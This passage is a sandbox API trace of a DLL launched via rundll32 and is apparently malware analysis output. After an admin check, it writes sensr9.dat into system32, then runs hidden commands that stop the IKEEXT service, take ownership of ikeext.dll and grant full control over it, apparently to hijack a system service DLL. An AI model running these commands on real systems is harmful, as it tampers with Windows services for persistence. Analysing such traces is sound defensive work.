lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0047.202] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.202] GetLastError () returned 0x57 [0047.202] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.202] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0047.202] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0047.203] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.203] GetLastError () returned 0x57 [0047.203] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.203] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.203] GetLastError () returned 0x57 [0047.203] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76590000 [0047.203] GetProcAddress (hModule=0x76590000, lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0047.204] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.204] GetLastError () returned 0x57 [0047.204] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.204] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0047.204] GetLastError () returned 0x7e [0047.204] GetProcAddress (hModule=0x76590000, lpProcName="FlsGetValue") returned 0x765e1e16 [0047.204] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0047.204] SetLastError (dwErrCode=0x7e) [0047.205] GetStartupInfoW (in: lpStartupInfo=0x14f4b8 | out: lpStartupInfo=0x14f4b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5ef18a30, hStdOutput=0xff1a5e, hStdError=0xfffffffe)) [0047.205] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0047.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0047.205] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0047.205] GetCommandLineA () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS" [0047.206] GetCommandLineW () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS" [0047.206] GetLastError () returned 0x7e [0047.206] SetLastError (dwErrCode=0x7e) [0047.206] GetLastError () returned 0x7e [0047.206] SetLastError (dwErrCode=0x7e) [0047.206] GetACP () returned 0x4e4 [0047.206] IsValidCodePage (CodePage=0x4e4) returned 1 [0047.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f4e8 | out: lpCPInfo=0x14f4e8) returned 1 [0047.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14edb0 | out: lpCPInfo=0x14edb0) returned 1 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x14eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0047.206] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x14edc4 | out: lpCharType=0x14edc4) returned 1 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x14eaf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0047.206] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.206] GetLastError () returned 0x57 [0047.206] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.206] GetProcAddress (hModule=0x76590000, lpProcName="LCMapStringEx") returned 0x7661f72b [0047.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0047.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14e8e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0047.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x14f2c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ>ê\x18^", lpUsedDefaultChar=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x14eb18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0047.207] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0047.207] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x14e908, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0047.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x14f1c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ>ê\x18^", lpUsedDefaultChar=0x0) returned 256 [0047.207] RtlInitializeSListHead (in: ListHead=0x5ef33f50 | out: ListHead=0x5ef33f50) [0047.207] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0047.207] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5ef34040, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe")) returned 0x20 [0047.207] GetEnvironmentStringsW () returned 0x283618* [0047.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1031, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1031 [0047.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1031, lpMultiByteStr=0x283e30, cbMultiByte=1031, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1031 [0047.207] FreeEnvironmentStringsW (penv=0x283618) returned 1 [0047.208] LoadLibraryA (lpLibFileName="Shlwapi") returned 0x76b40000 [0047.209] LoadLibraryA (lpLibFileName="Shell32") returned 0x758a0000 [0047.213] LoadLibraryA (lpLibFileName="Advapi32") returned 0x764f0000 [0047.227] SSSS () returned 0x0 [0047.227] IsUserAnAdmin () returned 1 [0047.228] GetNativeSystemInfo (in: lpSystemInfo=0x14eff8 | out: lpSystemInfo=0x14eff8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0047.228] GetSystemDirectoryA (in: lpBuffer=0x14f1a0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] PathFileExistsA (pszPath="C:\\Windows\\system32\\sensr9.dat") returned 0 [0047.228] CreateFileA (lpFileName="C:\\Windows\\system32\\sensr9.dat" (normalized: "c:\\windows\\system32\\sensr9.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x74 [0047.229] WriteFile (in: hFile=0x74, lpBuffer=0x5ef36000*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x14f038, lpOverlapped=0x0 | out: lpBuffer=0x5ef36000*, lpNumberOfBytesWritten=0x14f038*=0x1000, lpOverlapped=0x0) returned 1 [0047.230] CloseHandle (hObject=0x74) returned 1 [0047.230] GetLastError () returned 0x0 [0047.230] SetLastError (dwErrCode=0x0) [0047.230] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.230] GetLastError () returned 0x0 [0047.230] SetLastError (dwErrCode=0x0) [0047.230] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"", lpProcessInformation=0x14e6b8*(hProcess=0x70, hThread=0x74, dwProcessId=0xb7c, dwThreadId=0xb80)) returned 1 [0047.236] WaitForSingleObject (hHandle=0x70, dwMilliseconds=0xffffffff) returned 0x0 [0047.591] CloseHandle (hObject=0x70) returned 1 [0047.591] CloseHandle (hObject=0x74) returned 1 [0047.591] GetLastError () returned 0x0 [0047.591] SetLastError (dwErrCode=0x0) [0047.591] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.591] GetLastError () returned 0x0 [0047.591] SetLastError (dwErrCode=0x0) [0047.591] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"", lpProcessInformation=0x14e6b8*(hProcess=0x70, hThread=0x74, dwProcessId=0xba0, dwThreadId=0xba4)) returned 1 [0047.595] WaitForSingleObject (hHandle=0x70, dwMilliseconds=0xffffffff) returned 0x0 [0047.971] CloseHandle (hObject=0x70) returned 1 [0047.971] CloseHandle (hObject=0x74) returned 1 [0047.971] GetLastError () returned 0x0 [0047.971] SetLastError (dwErrCode=0x0) [0047.972] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.972] GetLastError () returned 0x0 [0047.972] SetLastError (dwErrCode=0x0) [0047.972] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"", lpProcessInformation=0x14e6b8*(hProcess=0x70, hThread=0x74, dwProcessId=0xbc0, dwThreadId=0xbc4)) returned 1 [0047.975] WaitForSingleObject (hHandle=0x70, dwMilliseconds=0xffffffff) returned 0x0 [0048.252] CloseHandle (hObject=0x70) returned 1 [0048.252] CloseHandle (hObject=0x74) returned 1 [0048.252] GetLastError () returned 0x0 [0048.252] SetLastError (dwErrCode=0x0) [0048.252] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.252] GetLastError () returned 0x0 [0048.252] SetLastError (dwErrCode=0x0) [0048.252] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, 